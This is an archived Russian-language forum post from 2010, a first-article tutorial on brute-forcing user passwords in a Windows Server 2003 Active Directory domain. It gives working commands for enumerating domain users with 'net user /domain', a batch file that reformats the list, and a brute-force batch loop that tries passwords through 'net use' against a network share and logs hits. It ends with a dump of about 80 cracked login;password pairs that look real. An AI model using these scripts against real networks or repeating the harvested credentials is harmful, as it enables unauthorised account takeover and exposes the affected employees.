PDA

Просмотр полной версии : Брутфорс в Active Directory


sXaNeR
21.04.2010, 18:07
Это моя первая статья , прошу не ругать.

В этой статье приведу пример брутфорса паролей обычных пользователей в домене, построенном на Active Directory (Windows Server 2003). Весь материал практический и проверен на приведённом примере.

1.Получаем в консоли список пользователей AD :
cmd> net user /domain >> username.txt

2.Получился файл username.txt вида :
__vmware_user__ aaii ababkovaeg
abaevalu abashevaia abdrahimovalm
abdrahimovaod abdrakhmanovadr abdrakhmanovaik
abdrakhmanovds abdulinalr abdulinma
abdulkarimovavk abdullinaa abdullinagr
abdullinalr abdullinayur abdullinma
abdulmanovpsh abdulovasv abdulovavb

3.Сделаем для простоты файл user.txt c именами пользователей в 1 столбик:
1)создадим Bat-файл parser.bat :
@for /f "tokens=1,2,3*" %%i in (username.txt) do (@echo %%i >>user.txt)&(@echo %%j >>user.txt)&(@echo %%k >> user.txt)
2) запускаем и ждём окончания.

4.Создаем файл паролей pass.txt с паролями в 1 столбик по одному,например :
11111111
12345678

5.Создаём Bat-файл brut.bat :
for /f %%i in (user.txt) do for /f %%j in (pass.txt) do (net use r: \\w300\foto %%j /user:****.ru\%%i /persistent:yes)&&(echo %%i;%%j>>success.txt)&&(net use r: /delete)

P.S: r: -временный несуществующий диск
\\w300\foto - любая существующая сетевая папка
****.ru - домен с AD

6. Запускаем brut.bat и ждём

7. По окончанию получен файл success.txt вида логин;пароль :

ahatovms;12345678
alehinasyu;11111111
batueveev;11111111
bikbulatovala;11111111
bochkovae;12345678
bogdanovama;12345678
bondarenkolp;11111111
boss;12345678
chudinoven;11111111
dyadkovatv;11111111
efremovas;12345678
gafurivann;11111111
gunbinana;12345678
ifepo;11111111
ifepoe;11111111
izjurovaa;12345678
jkmuf;11111111
kashiginaas;11111111
konovalovana;11111111
konyaevaea;12345678
korgakovasv;12345678
kostarevaam;11111111
kosyyie;12345678
kozevnikovald;11111111
kuksovalv;11111111
kursi;11111111
labeikinas;12345678
litkesg;11111111
lupanovaiv;11111111
lyashenkoyuv;11111111
martynovakju;12345678
maryaninovna;11111111
matrosds;11111111
mosienkomu;12345678
moskalenkooa;12345678
mudrakln;11111111
nikonovadr;12345678
ntuser;11111111
ognevayamm;11111111
olimpinf;11111111
omarovaka;12345678
paryshevaae;12345678
pesinla;11111111
pivchenkoea;12345678
plotnikovaev2;aaaaaaaa
poletaevsn;12345678
popovsm;12345678
portnovab;11111111
pozdnyakovaep;12345678
pozhnikovaas;12345678
pu-85;11111111
pyatnitskiyas;11111111
ReslerLA;12345678
safronovas;11111111
shankovskihea;11111111
shaysultanovaoa;11111111
shefersv;11111111
shhukinaia;12345678
shkiravp;12345678
shvarevaia;11111111
sibagatulinnaai;12345678
stafeevams;11111111
tatarinovam;11111111
team3;11111111
tolkachevaev;11111111
trenkleee;11111111
troyanoviv;12345678
turovecgv;12345678
u1;11111111
u2;11111111
u4;11111111
u5;11111111
uit_pochta;11111111
volozeninanb;11111111
yashinama;12345678
zaharovavm;11111111

8.Чтобы просмотреть права пользователя вводим :
cmd> net user имя_пользователя@****.ru // или ваш домен



Спасибо за внимание!